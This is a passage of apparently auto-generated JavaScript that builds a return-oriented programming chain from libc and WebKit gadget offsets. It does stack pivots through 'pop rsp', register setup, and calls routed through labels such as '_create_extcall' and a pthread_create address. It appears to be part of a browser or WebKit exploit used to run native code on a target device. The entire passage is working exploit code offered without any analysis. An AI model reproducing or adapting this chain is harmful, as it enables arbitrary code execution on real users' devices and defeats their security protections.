webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+154464, //L2235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2235:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2237:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+154624, //L2240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+154592, //L2238
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+154608, //L2239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2238:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2239:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2240:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+154704, //L2241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2241:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2243:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+154824, //L2246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+154808, //L2244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2244:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2246:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+154968, //L2249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+154936, //L2247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+154952, //L2248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2247:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2248:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2249:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+155040, //L2251
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2251:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+155096, //L2252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2252:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+155176, //L2254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2254:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2256:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+155296, //L2259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+155280, //L2257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2257:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2259:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+155472, //L2262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+155488, //L2263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+155440, //L2260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+155456, //L2261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2260:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2261:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2262:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2263:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+155600, //L2264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+155632, //L2266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+155616, //L2265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2264:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2265:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2266:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+155720, //L2268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2268:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+155776, //L2269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2269:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+155872, //L2272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2272:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+155928, //L2273
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2273:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2275:
db([16, 0]); // 0x10
set_gadget(libc_base+763368,); //pop rcx
//L2276:
db([16, 0]); // 0x10
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+156080, //L2278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2278:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+156136, //L2279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2279:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+156240, //L2281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2281:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2283:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+156360, //L2286
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+156344, //L2284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2284:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2286:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+156504, //L2289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+156472, //L2287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+156488, //L2288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2287:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2288:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2289:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+156584, //L2290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2290:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2292:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+156704, //L2295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+156688, //L2293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2293:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2295:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+156848, //L2298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+156816, //L2296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+156832, //L2297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2296:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2297:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2298:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L2300:
ropchain+156952, //L2299
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+86896, //_create_extcall
//L2299:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+157024, //L2301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2301:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2303:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+157144, //L2306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157128, //L2304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2304:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2306:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+157288, //L2309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157256, //L2307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+157272, //L2308
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2307:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2308:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2309:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L2310:
jop_frame_addr,
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+157416, //L2311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2311:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2313:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+157536, //L2316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157520, //L2314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2314:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2316:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+157680, //L2319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157648, //L2317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+157664, //L2318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2317:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2318:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2319:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+157760, //L2320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2320:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2322:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+157880, //L2325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157864, //L2323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2323:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2325:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+158024, //L2328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157992, //L2326
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+158008, //L2327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2326:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2327:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2328:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L2330:
ropchain+158128, //L2329
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+159008, //L2331
//L2329:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+158272, //L2333
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158288, //L2334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+158256, //L2332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2332:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2333:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2334:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+158400, //L2335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158432, //L2337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+158416, //L2336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2335:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2336:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2337:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+158536, //L2338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158552, //L2339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2338:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2339:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+158672, //L2340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158656, //L2341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2341:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2340:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+158760, //L2343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+158744, //L2342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2342:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2343:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+158864, //L2344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158880, //L2345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2344:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2345:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+159000, //L2346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158984, //L2347
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2347:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2346:
db([0, 0]); // 0x0
//L2331:
set_gadget(libc_base+764760,); //pop rsi
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+1438842, //pop rdx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+3236123, //pop r9
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+756281, //xor rax, rax
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+782311, //pop rsp
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967080, 4294967295]); // -0xd8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([200, 0]); // 0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967088, 4294967295]); // -0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([192, 0]); // 0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967096, 4294967295]); // -0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([184, 0]); // 0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967104, 4294967295]); // -0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([176, 0]); // 0xb0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967112, 4294967295]); // -0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([168, 0]); // 0xa8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
webkit_base+14664103, //and rax, rcx
libc_base+763368, //pop rcx
pthread_create_addr,
webkit_base+20307877, //mov [rax], rcx
libc_base+764760 //pop rsi
]);
db([4294967192, 4294967295]); // -0x68
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([48, 0]); // 0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([32, 0]); // 0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([24, 0]); // 0x18
